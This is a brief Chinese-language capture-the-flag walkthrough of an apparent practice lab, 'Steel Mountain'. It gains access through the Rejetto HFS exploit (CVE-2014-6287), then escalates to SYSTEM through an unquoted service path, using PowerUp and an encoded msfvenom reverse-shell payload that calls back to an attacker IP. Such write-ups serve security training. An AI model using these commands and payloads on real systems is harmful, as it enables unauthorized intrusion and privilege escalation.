Steel Mountain

8080有hfs

CVE-2014-6287

用msf
windows/http/rejetto_hfs_exec

一把子嗦了

search -f *.txt

额 接下来用脚本

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

Upload PowerUp.ps1

load powershell
powershell_shell//进入powershell模式

. .\PowerUp.ps1
Invoke-AllChecks

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

有个CanRestart : True程序

执行路径有空格
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
但是没有用引号包围

会执行Program.exe然后C:\Program Files (x86)\IObit\Advanced.exe 直接劫持

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.6.173 LPORT=4444 -e x86/shikata_ga_nai -f exe -o Advanced.exe

然后监听
msfconsole -qx 'use exploit/multi/handler;set lhost 10.17.6.173;set lport 4444;set payload windows/meterpreter/reverse_tcp;run'

shell模式下

net stop AdvancedSystemCareService9
net start AdvancedSystemCareService9

cat "C:\Users\Administrator\Desktop\root.txt"

不用msf的话

Invoke-WebRequest -URI $URL -OutFile winPEAS.exe

当然我们已经知道是service了

powershell -c "Get-Service"
直接执行就行